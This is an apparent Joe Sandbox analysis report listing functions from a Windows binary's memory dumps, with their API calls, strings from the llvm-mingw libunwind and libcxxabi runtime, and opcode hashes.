Part of subcall function 00007FF6099C0A70: strlen.MSVCRT ref: 00007FF6099C0B79

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 770973918-3503049562
Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction ID: 121d2432d931cabd3cc9c7670c9b904fbf047af4b555babcf9664f77c86b83bf
Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction Fuzzy Hash: 7331E032A1978286EA15CF24D5443A837A6EB45B41F294635DE5C8B3E3EF3CF6868300

Function 00007FF6099C1215 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6099C0B79
malloc.MSVCRT ref: 00007FF6099C1251
_assert.MSVCRT ref: 00007FF6099C1E69
malloc.MSVCRT ref: 00007FF6099C1EB6

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction ID: 59a28caef9fbf7784db25128393e9354cba6fb2d650390dc383d12fcc28bdbcd
Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction Fuzzy Hash: 0321E73260A74189EB55CF14E4487AD37A9EB05B80F690636EE5D877A2DF3CE546C310

Function 00007FF6099CC460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CC498
realloc.MSVCRT ref: 00007FF6099CC4FF

Strings

[enable, xrefs: 00007FF6099CC4A9
_if:, xrefs: 00007FF6099CC4B7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: [enable$_if:
API String ID: 471065373-3342140569
Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction ID: c2a7ff54ec4b7d2e2a1cd84b7ea0cd5774d5539529b58c1ed8ab7d18242774c2
Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction Fuzzy Hash: 1E1187F2A0AB8683DE189F06F95426DA766EB54BC0F54C931CB8E47792EF3CE4418300

Function 00007FF6099B8600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B862C
fflush.MSVCRT ref: 00007FF6099B8678

Strings

libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p), xrefs: 00007FF6099B8658
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B8625

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
API String ID: 1137233558-3294674404
Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction ID: 3e72624d4273db5f485b76e497f58ffadefe8716ded654b24eaa5ff87460f7be
Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction Fuzzy Hash: 94119421F0B64682F7149F26E95027837666F98B94F2C4035CD5EC37A2DE3CA8868300

Function 00007FF6099C70F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C7133
memcpy.MSVCRT ref: 00007FF6099C715E

Strings

false, xrefs: 00007FF6099C7146
true, xrefs: 00007FF6099C714D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: false$true
API String ID: 2500458235-2658103896
Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction ID: 0aa838aff02859198fef2fa071e1529e5665c1b2ae84deee61acebe95395b169
Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction Fuzzy Hash: 2001B5E2E0AA4642FB189F52E9903A96362AB547C0F688831CA5C47793EE2CD4918300

Function 00007FF6099B89B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B89E2
fflush.MSVCRT ref: 00007FF6099B8A2D

Strings

libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu), xrefs: 00007FF6099B8A0D
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B89DB

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
API String ID: 1137233558-3584756005
Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction ID: b6f6c7361e4a01b6ebbbc77493d876abdfdec2728ecd3c418ffb18d742ca629e
Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction Fuzzy Hash: CB11E151E0F69642FB149F23AD152B52B926F95BD0F280036DD1E97BE3EE3CA9428300

Function 00007FF6099B4D00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6099B8C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6099B4D18,?,?,?,00007FF6099B2E71,?,?,00007FF609ADCC48,00000000,00007FF6099B1609), ref: 00007FF6099B8C11

FlsGetValue.KERNEL32(?,?,?,00007FF6099B2E71,?,?,00007FF609ADCC48,00000000,00007FF6099B1609,?,?,?,?,00007FF6099B1315), ref: 00007FF6099B4D22

Part of subcall function 00007FF6099B80D0: calloc.MSVCRT ref: 00007FF6099B80DD
Part of subcall function 00007FF6099B80D0: memset.MSVCRT ref: 00007FF6099B8106

Part of subcall function 00007FF6099B8C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6099B4E16), ref: 00007FF6099B8C94

Strings

cannot allocate __cxa_eh_globals, xrefs: 00007FF6099B4D6D
std::__libcpp_tls_set failure in __cxa_get_globals(), xrefs: 00007FF6099B4D79
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF6099B4D61

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: OnceValue$ExecuteInitcallocmemset
String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
API String ID: 2044551959-1509371760
Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction ID: 9a56498c59801da2cf9196d782d9a084f096ed0655cd518cc02b6899cade979f
Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction Fuzzy Hash: E4011D20E1B10742FA94AF52EA512F422675FD4784F7C0871D91DC6BE3EE2CB8519300

Function 00007FF6099B8880 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B88A8
fflush.MSVCRT ref: 00007FF6099B88ED

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B88A1
libunwind: __unw_get_proc_info(cursor=%p, &info=%p), xrefs: 00007FF6099B88CE

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
API String ID: 1137233558-1935908800
Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction ID: 803faaa5588d0a2446cb4036055ad7d7c3f99058c28057477c8364a1daa42c54
Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction Fuzzy Hash: F6019210E0F69642FB149F26E9453B52766AF48BD0F2C4035CD2E977E3EE2CA9818300

Function 00007FF6099B18B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF6099B1C09), ref: 00007FF6099B19EF
_assert.MSVCRT ref: 00007FF6099B1A08

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6099B19FB
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6099B19F4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
API String ID: 1072228434-1306384422
Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction ID: 457418d3839cb12122cca8dc640e875e4a0c56d7eb08bacd4b7b635a17554371
Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction Fuzzy Hash: 19014623E0E69650FE768F45F7A117812A6AF54392F7D0436CE4DD2393EE2DB8898200

Function 00007FF6099CB380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB3E6
memcpy.MSVCRT ref: 00007FF6099CB400
_assert.MSVCRT ref: 00007FF6099CB42A

Strings

basic_istream, xrefs: 00007FF6099CB385
basi, xrefs: 00007FF6099CB39A

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_istream
API String ID: 2326172077-1189760207
Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction ID: 369dfa2cc5287d9445791d5dfb2fe814ae20edcc8fdb286cc3e02d91663da602
Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction Fuzzy Hash: 4E0184E2F0A65283EA648F06F980769A392DB187C0F588431CB5D47B86EF2CE5508300

Function 00007FF6099CB38E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB3E6
memcpy.MSVCRT ref: 00007FF6099CB400
_assert.MSVCRT ref: 00007FF6099CB42A

Strings

basi, xrefs: 00007FF6099CB39A
basic_iostream, xrefs: 00007FF6099CB393

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_iostream
API String ID: 2326172077-3201662033
Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction ID: 54b4849e2ccaa3856686a44585e0592b7d1b5b7cd1426123d15c016e6573f3fa
Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction Fuzzy Hash: 1AF062F6B0675283EA648F06FA80769A792EB687C4F588431CB5D47B86EF2CD5908300

Function 00007FF6099B8920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B8944
fflush.MSVCRT ref: 00007FF6099B8986

Strings

libunwind: __unw_resume(cursor=%p), xrefs: 00007FF6099B896A
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B893D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction ID: 70e6121850070ffdee5434f5bcd7b0dcb84beb5b8348b8da1702e85e82f45e7b
Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction Fuzzy Hash: DF01FD10E0F69642FB10AF26E9543B837625F49BC1F2C0035CE1E937E3DE2CA9828301

Function 00007FF6099B87F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6099B8814
fflush.MSVCRT ref: 00007FF6099B8856

Strings

libunwind: __unw_step(cursor=%p), xrefs: 00007FF6099B883A
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6099B880D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
API String ID: 1137233558-3760164396
Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction ID: e9078e9edca9f22bc9a5e6fd38b176952543119ba480132a2a02723200bfb403
Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction Fuzzy Hash: 4E016710E0F69642F7149F66E9412B427675F55B90F684035CD1E937D3DE6D65418300

Function 00007FF6099B3ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6099B3F11
RaiseException.KERNEL32(?,?,?,00000030,00007FF6099B2F54), ref: 00007FF6099B3F37

Strings

libunwind: _Unwind_RaiseException(ex_obj=%p), xrefs: 00007FF6099B3EF5
CCG , xrefs: 00007FF6099B3F2A

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: ExceptionRaisefflush
String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
API String ID: 3404444629-1152080672
Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction ID: d7be514cd07215df4fee18517b153daa8b9add0c634b87bdbdec64db8432b465
Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction Fuzzy Hash: F4F0C210E0969543F629AF6ABA462F45376AF887D1F185135EE4D83793FE3D9A828300

Function 00007FF6099B2C20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6099B2C46
GetProcAddress.KERNEL32 ref: 00007FF6099B2C56

Strings

_localtime64_s, xrefs: 00007FF6099B2C4C
msvcrt.dll, xrefs: 00007FF6099B2C3F

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
